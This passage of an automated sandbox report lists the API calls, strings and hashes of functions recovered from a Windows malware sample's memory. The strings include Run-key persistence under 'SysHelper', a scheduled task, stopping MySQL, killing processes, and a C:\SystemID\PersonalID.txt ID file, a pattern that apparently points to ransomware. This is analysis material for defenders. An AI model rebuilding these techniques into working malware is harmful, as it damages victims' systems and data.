                                • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                                • _free.LIBCMT ref: 0041BCD7
                                  • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                  • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                  • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                  • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                  • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                  • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                • IsWindow.USER32(?), ref: 0041BF69
                                • DestroyWindow.USER32(?), ref: 0041BF7B
                                • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                • String ID:
                                • API String ID: 3873257347-0
                                • Opcode ID: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                                • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                • Opcode Fuzzy Hash: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                                • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                APIs
                                • DecodePointer.KERNEL32 ref: 00427B29
                                • _free.LIBCMT ref: 00427B42
                                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                • _free.LIBCMT ref: 00427B55
                                • _free.LIBCMT ref: 00427B73
                                • _free.LIBCMT ref: 00427B85
                                • _free.LIBCMT ref: 00427B96
                                • _free.LIBCMT ref: 00427BA1
                                • _free.LIBCMT ref: 00427BC5
                                • EncodePointer.KERNEL32(00674FD8), ref: 00427BCC
                                • _free.LIBCMT ref: 00427BE1
                                • _free.LIBCMT ref: 00427BF7
                                • _free.LIBCMT ref: 00427C1F
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                • String ID:
                                • API String ID: 3064303923-0
                                • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                                • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 00411BB0
                                • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                • CoUninitialize.OLE32 ref: 00411BD0
                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                • lstrcatW.KERNEL32(?), ref: 00411C44
                                • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                • String ID: \shell32.dll
                                • API String ID: 679253221-3783449302
                                • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                APIs
                                • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                • GetDesktopWindow.USER32 ref: 004549FB
                                • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                • _wcsstr.LIBCMT ref: 00454A8A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                • String ID: Service-0x$_OPENSSL_isservice
                                • API String ID: 2112994598-1672312481
                                • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                APIs
                                • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                • __vfwprintf_p.LIBCMT ref: 00454B27
                                  • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                • vswprintf.LIBCMT ref: 00454B5D
                                • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                • String ID: OPENSSL$OpenSSL: FATAL
                                • API String ID: 277090408-1348657634
                                • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                • _memset.LIBCMT ref: 004123B6
                                • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                • GetCommandLineW.KERNEL32 ref: 004123F4
                                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                • lstrcpyW.KERNEL32(?,00000000), ref: 0041240E
                                • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                • SysHelper, xrefs: 004123D6
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                • API String ID: 122392481-4165002228
                                • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                • lstrcpyW.KERNEL32(?,?), ref: 0040DBD6
                                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                • _memset.LIBCMT ref: 0040DC38
                                • CoUninitialize.OLE32 ref: 0040DC92
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                • String ID: --Task$Comment$Time Trigger Task
                                • API String ID: 330603062-1376107329
                                • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                • Sleep.KERNEL32(?), ref: 00411A75
                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                • String ID: MYSQL
                                • API String ID: 2359367111-1651825290
                                • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                APIs
                                • std::exception::exception.LIBCMT ref: 0044F27F
                                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                • __CxxThrowException@8.LIBCMT ref: 0044F294
                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                • std::exception::exception.LIBCMT ref: 0044F2AD
                                • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                  • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                • std::exception::exception.LIBCMT ref: 0044F2FB
                                • __CxxThrowException@8.LIBCMT ref: 0044F310
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                • String ID: bad function call
                                • API String ID: 2464034642-3612616537
                                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                APIs
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast
                                • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                • API String ID: 1717984340-2085858615
                                • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                • String ID:
                                • API String ID: 790675137-0
                                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                APIs
                                  • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                • _fgetws.LIBCMT ref: 0040C7BC
                                • _memmove.LIBCMT ref: 0040C89F
                                • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                • API String ID: 2864494435-54166481
                                • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                • String ID: cmd.exe
                                • API String ID: 2696918072-723907552
                                • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                APIs
                                • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: SHGetFolderPathW$Shell32.dll$\
                                • API String ID: 2574300362-2555811374
                                • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _malloc$__except_handler4_fprintf
                                • String ID: &#160;$Error encrypting message: %s$\\n
                                • API String ID: 1783060780-3771355929
                                • Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                • Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _strncmp
                                • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                • API String ID: 909875538-2908105608
                                • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseValue$OpenQuery
                                • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                • API String ID: 3962714758-1667468722
                                • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                APIs
                                • _memset.LIBCMT ref: 0041E707
                                  • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                • InternetOpenW.WININET ref: 0041E743
                                • _wcsstr.LIBCMT ref: 0041E7AE
                                • _memmove.LIBCMT ref: 0041E838
                                • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
